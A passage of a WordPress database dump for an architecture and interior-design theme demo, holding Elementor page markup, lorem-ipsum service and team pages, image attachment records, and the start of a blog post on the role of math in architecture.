.elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n				Interior\n									60%\n			<section>\n																																	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Kevin martin\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Kevin martin</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Jessica brown </p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Mike hardson\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Mike hardson</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n			</section>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"370\" height=\"271\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-planning-stage.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-planning-stage.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Planning stage</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-flexible-output.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-flexible-output.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Flexible output</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n					<ul>\n							<li>\n										Complete italian wooden works\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-new-material.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-new-material.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>New material</h2>		\n		There are many variations of passages of psum available but the majority have suffered.		\n					<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										  Premium quality of full apartment\n									</li>\n						</ul>','Sarah Albert','','publish','closed','closed','','sarah-albert','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=team&#038;p=1100',0,'team','',0),(1153,1,'2022-06-16 02:43:16','2022-06-16 02:43:16','','modern-villa','','inherit','open','closed','','modern-villa-2','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',613,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/modern-villa.jpg',0,'attachment','image/jpeg',0),(1154,1,'2022-06-16 02:44:32','2022-06-16 02:44:32','','vintage design','','inherit','open','closed','','vintage-design-2','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',619,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/vintage-design.jpg',0,'attachment','image/jpeg',0),(1155,1,'2022-06-16 02:54:06','2022-06-16 02:54:06','','Simple home','','inherit','open','closed','','simple-home-2','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',624,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Simple-home.jpg',0,'attachment','image/jpeg',0),(1156,1,'2022-06-16 02:59:16','2022-06-16 02:59:16','','luxyry room','','inherit','open','closed','','luxyry-room','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',629,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/luxyry-room.jpg',0,'attachment','image/jpeg',0),(1158,1,'2022-06-16 03:00:57','2022-06-16 03:00:57','','Idea interior','','inherit','open','closed','','idea-interior-2','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',634,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Idea-interior.jpg',0,'attachment','image/jpeg',0),(1159,1,'2022-06-16 03:01:54','2022-06-16 03:01:54','','buildings','','inherit','open','closed','','buildings-2','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',639,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/buildings.jpg',0,'attachment','image/jpeg',0),(1160,1,'2022-06-16 03:03:06','2022-06-16 03:03:06','','Domestic','','inherit','open','closed','','domestic-2','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',657,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Domestic.jpg',0,'attachment','image/jpeg',0),(1161,1,'2022-06-16 03:03:59','2022-06-16 03:03:59','','Philip Johnson','','inherit','open','closed','','philip-johnson-2','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',662,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg',0,'attachment','image/jpeg',0),(1163,1,'2022-06-16 03:05:39','2022-06-16 03:05:39','','Richard Rogers','','inherit','open','closed','','richard-rogers-2','','','2022-06-16 03:05:39','2022-06-16 03:05:39','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Richard-Rogers.jpg',0,'attachment','image/jpeg',0),(1165,1,'2022-06-16 03:07:32','2022-06-16 03:07:32','','cozy living room','','inherit','open','closed','','cozy-living-room-2','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',677,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/cozy-living-room.jpg',0,'attachment','image/jpeg',0),(1167,1,'2022-06-16 03:07:57','2022-06-16 03:07:57','','greater-commercial','','inherit','open','closed','','greater-commercial-2','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',684,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/greater-commercial.jpg',0,'attachment','image/jpeg',0),(1171,1,'2022-06-16 03:44:44','2022-06-16 03:44:44','','service-01','','inherit','open','closed','','service-01','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/service-01.jpg',0,'attachment','image/jpeg',0),(1173,1,'2022-06-16 03:47:29','2022-06-16 03:47:29','<ul>\n																						  	<li>\n													<a href=\"https://demo.ovatheme.com/retirio/service/architecture/\" >\n									Architecture								\n							</a>\n						</li>\n																	  	<li>\n													<a href=\"https://demo.ovatheme.com/retirio/service/interior-work/\" >\n									Interior work								\n							</a>\n						</li>\n																	  	<li>\n													<a href=\"https://demo.ovatheme.com/retirio/service/renovation/\" >\n									Renovation								\n							</a>\n						</li>\n																	  	<li>\n													<a href=\"https://demo.ovatheme.com/retirio/service/decor-art/\" >\n									Decor &#038; art								\n							</a>\n						</li>\n									    			        				</ul>\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						Easy solutions to your home beauty					\n				</h3>\n							Call anytime						\n					<ul>\n								<li>\n																					<a href=\"tel:980009630 \">\n													+ 98 (000) - 9630												</a>\n																			</li>\n											</ul>\n			<a href=\"#\" role=\"button\">\n						Download our flyers\n					</a>','Service Sidebar','','publish','closed','closed','','service-sidebar','','','2022-06-16 03:47:29','2022-06-16 03:47:29','',0,'https://demo.ovatheme.com/retirio/?post_type=elementor_library&amp;p=1173',0,'elementor_library','',0),(1204,1,'2022-06-16 04:40:17','2022-06-16 04:40:17','','bg-service-sidebar-contact','','inherit','open','closed','','bg-service-sidebar-contact','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',1173,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/bg-service-sidebar-contact.jpg',0,'attachment','image/jpeg',0),(1244,1,'2022-06-16 05:09:10','2022-06-16 05:09:10','','decor-service-details','','inherit','open','closed','','decor-service-details','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-service-details.jpg',0,'attachment','image/jpeg',0),(1349,2,'2022-06-16 07:09:13','2022-06-16 07:09:13','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Interior work</h2>\nThere are many variations of passages of lorem ipsum is simply free text available in the market, but the majority time you put aside to be in our office. Lorem ipsum dolor sit amet, consectetLorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.\n\nWe stand for quality, safety &amp; credibility, so you could be trust us fully about architectural working process.\n\nUt enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/decor-service-details.jpg\" title=\"decor-service-details\" alt=\"decor-service-details\">\n<h3>Our benefits</h3>\nDuis aute irure dolor in reprehenderit in voluptate velit esse cillum.\n\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nPraesent efficitur quam sit amet</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNunc cursus dolor id purus euismod</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nQuisque tincidunt eros ac place viverra</li>\n</ul>\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}</style>												<a href=\"\">Visualization to finished interior</a>\nThere are many variations of passages of simply free text available, but the majority have suffered alteration in some form.\n<a href=\"\">Architect draws sketches</a>\nThere are many variations of passages of simply free text available, but the majority have suffered alteration in some form.','Commercial Design','Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.','publish','closed','closed','','commercial-design','','','2023-05-25 10:53:38','2023-05-25 10:53:38','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_sev&#038;p=1349',0,'ova_sev','',0),(1354,2,'2022-06-16 07:11:23','2022-06-16 07:11:23','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Architecture</h2>\nThere are many variations of passages of lorem ipsum is simply free text available in the market, but the majority time you put aside to be in our office. Lorem ipsum dolor sit amet, consectetLorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.\n\nWe stand for quality, safety &amp; credibility, so you could be trust us fully about architectural working process.\n\nUt enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/decor-service-details.jpg\" title=\"decor-service-details\" alt=\"decor-service-details\">\n<h3>Our benefits</h3>\nDuis aute irure dolor in reprehenderit in voluptate velit esse cillum.\n\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nPraesent efficitur quam sit amet</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNunc cursus dolor id purus euismod</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nQuisque tincidunt eros ac place viverra</li>\n</ul>\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}</style>												<a href=\"\">Visualization to finished interior</a>\nThere are many variations of passages of simply free text available, but the majority have suffered alteration in some form.\n<a href=\"\">Architect draws sketches</a>\nThere are many variations of passages of simply free text available, but the majority have suffered alteration in some form.','Home Design','Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.','publish','closed','closed','','home-design','','','2023-05-25 10:53:27','2023-05-25 10:53:27','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_sev&#038;p=1354',0,'ova_sev','',0),(1415,1,'2022-06-17 01:57:40','2022-06-17 01:57:40','','kevin martin','','inherit','open','closed','','kevin-martin-2','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg',0,'attachment','image/jpeg',0),(1416,1,'2022-06-17 01:57:59','2022-06-17 01:57:59','','jessica','','inherit','open','closed','','jessica','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg',0,'attachment','image/jpeg',0),(1417,1,'2022-06-17 01:58:11','2022-06-17 01:58:11','','mike hardson','','inherit','open','closed','','mike-hardson-2','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg',0,'attachment','image/jpeg',0),(1514,1,'2022-06-17 02:58:32','2022-06-17 02:58:32','','map-testimonial-home-2a','','inherit','open','closed','','map-testimonial-home-2a','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/map-testimonial-home-2a.png',0,'attachment','image/png',0),(1538,1,'2022-06-17 03:15:41','2022-06-17 03:15:41','','background-2','','inherit','open','closed','','background-2','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/background-2.jpg',0,'attachment','image/jpeg',0),(1615,1,'2022-06-17 04:53:12','2022-06-17 04:53:12','','background-3','','inherit','open','closed','','background-3','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/background-3.jpg',0,'attachment','image/jpeg',0),(1708,1,'2022-06-21 08:23:21','2022-06-21 08:23:21','','bg-revslider-home1-01','','inherit','open','closed','','bg-revslider-home1-01','','','2022-06-21 08:23:21','2022-06-21 08:23:21','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/bg-revslider-home1-01.jpg',0,'attachment','image/jpeg',0),(1709,1,'2022-06-21 08:23:24','2022-06-21 08:23:24','','bg-revslider-home1-02','','inherit','open','closed','','bg-revslider-home1-02','','','2022-06-21 08:23:24','2022-06-21 08:23:24','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/bg-revslider-home1-02.jpg',0,'attachment','image/jpeg',0),(1710,1,'2022-06-21 08:23:26','2022-06-21 08:23:26','','bg-revslider-home1-03','','inherit','open','closed','','bg-revslider-home1-03','','','2022-06-21 08:23:26','2022-06-21 08:23:26','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/bg-revslider-home1-03.jpg',0,'attachment','image/jpeg',0),(1792,1,'2022-06-22 03:25:20','2022-06-22 03:25:20','','bg-revslider-home2-01','','inherit','open','closed','','bg-revslider-home2-01','','','2022-06-22 03:25:20','2022-06-22 03:25:20','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/bg-revslider-home2-01.jpg',0,'attachment','image/jpeg',0),(1793,1,'2022-06-22 03:25:21','2022-06-22 03:25:21','','bg-revslider-home2-02','','inherit','open','closed','','bg-revslider-home2-02','','','2022-06-22 03:25:21','2022-06-22 03:25:21','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/bg-revslider-home2-02.jpg',0,'attachment','image/jpeg',0),(1794,1,'2022-06-22 03:25:22','2022-06-22 03:25:22','','bg-revslider-home2-03','','inherit','open','closed','','bg-revslider-home2-03','','','2022-06-22 03:25:22','2022-06-22 03:25:22','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/bg-revslider-home2-03.jpg',0,'attachment','image/jpeg',0),(1896,1,'2022-06-22 08:26:08','2022-06-22 08:26:08','','background-get-interior','','inherit','open','closed','','background-get-interior','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/background-get-interior.png',0,'attachment','image/png',0),(1901,1,'2022-06-22 08:41:32','2022-06-22 08:41:32','','01-test','','inherit','open','closed','','01-test','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/01-test.png',0,'attachment','image/png',0),(1903,1,'2022-06-22 08:44:31','2022-06-22 08:44:31','','02-home1','','inherit','open','closed','','02-home1','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/02-home1.png',0,'attachment','image/png',0),(1904,1,'2022-06-22 08:44:44','2022-06-22 08:44:44','','03-home1','','inherit','open','closed','','03-home1','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/03-home1.png',0,'attachment','image/png',0),(1905,1,'2022-06-22 08:44:58','2022-06-22 08:44:58','','04-home1','','inherit','open','closed','','04-home1','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/04-home1.png',0,'attachment','image/png',0),(1906,1,'2022-06-22 08:44:58','2022-06-22 08:44:58','','05-home1','','inherit','open','closed','','05-home1','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/05-home1.png',0,'attachment','image/png',0),(1907,1,'2022-06-22 08:44:59','2022-06-22 08:44:59','','06-home1','','inherit','open','closed','','06-home1','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/06-home1.png',0,'attachment','image/png',0),(1973,1,'2022-06-22 09:25:46','2022-06-22 09:25:46','','bg-banner-home3','','inherit','open','closed','','bg-banner-home3','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/bg-banner-home3.jpg',0,'attachment','image/jpeg',0),(2075,1,'2022-06-22 09:52:25','2022-06-22 09:52:25','','aboutbg','','inherit','open','closed','','aboutbg','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/aboutbg.png',0,'attachment','image/png',0),(2090,1,'2022-06-22 10:01:48','2022-06-22 10:01:48','','image-why-choose','','inherit','open','closed','','image-why-choose','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose.jpg',0,'attachment','image/jpeg',0),(2116,1,'2022-06-22 10:11:42','2022-06-22 10:11:42','','bg-whychoose','','inherit','open','closed','','bg-whychoose','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/bg-whychoose.png',0,'attachment','image/png',0),(2325,1,'2022-06-23 01:42:01','2022-06-23 01:42:01','','image','','inherit','open','closed','','image-3','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.png',0,'attachment','image/png',0),(2346,1,'2022-06-23 03:37:06','2022-06-23 03:37:06','','about-me-flexible-output','','inherit','open','closed','','about-me-flexible-output','','','2022-06-23 03:37:06','2022-06-23 03:37:06','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output.jpg',0,'attachment','image/jpeg',0),(2347,1,'2022-06-23 03:37:06','2022-06-23 03:37:06','','about-me-new-material','','inherit','open','closed','','about-me-new-material','','','2022-06-23 03:37:06','2022-06-23 03:37:06','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material.jpg',0,'attachment','image/jpeg',0),(2348,1,'2022-06-23 03:37:06','2022-06-23 03:37:06','','about-me-planning-stage','','inherit','open','closed','','about-me-planning-stage','','','2022-06-23 03:37:06','2022-06-23 03:37:06','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage.jpg',0,'attachment','image/jpeg',0),(2350,1,'2022-06-23 03:47:55','2022-06-23 03:47:55','https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/cropped-thumbnail.png','cropped-thumbnail.png','','inherit','open','closed','','cropped-thumbnail-png','','','2022-06-23 03:47:55','2022-06-23 03:47:55','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/cropped-thumbnail.png',0,'attachment','image/png',0),(2413,1,'2022-06-23 08:08:09','2022-06-23 08:08:09','','service-02','','inherit','open','closed','','service-02','','','2022-06-23 08:08:09','2022-06-23 08:08:09','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/service-02.jpg',0,'attachment','image/jpeg',0),(2414,1,'2022-06-23 08:08:09','2022-06-23 08:08:09','','service-03','','inherit','open','closed','','service-03','','','2022-06-23 08:08:09','2022-06-23 08:08:09','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/service-03.jpg',0,'attachment','image/jpeg',0),(2415,1,'2022-06-23 08:08:10','2022-06-23 08:08:10','','resedential-home','','inherit','open','closed','','service-04','','','2023-05-25 10:50:07','2023-05-25 10:50:07','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/service-04.jpg',0,'attachment','image/jpeg',0),(2430,3,'2023-09-23 09:00:32','2023-09-23 09:00:32','<!-- wp:paragraph -->\n<p>Architecture is a captivating and creative field that involves designing and creating the spaces where we live, work, and play. It\'s a profession that merges art and science, aesthetics, and functionality. One question that often arises, especially among aspiring architects, is whether math plays a crucial role in architecture. Let\'s explore the relationship between math and architecture to better understand its significance.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">The Basics: Geometry and Arithmetic</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>At its core, architecture does require a basic understanding of mathematics. Geometry is particularly important, as it deals with shapes, sizes, proportions, and angles—all fundamental aspects of architectural design. Architects use geometric principles to create balanced and visually pleasing structures. They calculate dimensions, layout designs, and ensure structural integrity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Arithmetic is another essential mathematical skill in architecture. It involves basic calculations for measurements, budgeting, and project planning. Architects must be able to work with numbers accurately to estimate costs, allocate resources, and meet project deadlines.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">Structural Engineering and Calculations</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Mathematics becomes even more critical when it comes to structural engineering within architecture. Architects work closely with structural engineers to ensure that buildings are safe and stable. Engineers use complex mathematical calculations to determine load-bearing capacities, stress analysis, and the choice of materials. While architects may not perform these calculations themselves, they need to understand and communicate effectively with engineers to bring their designs to life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">Computer-Aided Design (CAD)</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>In today\'s digital age, computer-aided design (CAD) software is a standard tool in architectural practice. CAD software relies heavily on mathematical algorithms to create precise and detailed architectural drawings. Architects use CAD to draft plans, design blueprints, and generate 3D models. Proficiency in CAD requires a solid grasp of mathematical concepts, as precise measurements and calculations are integral to the software\'s 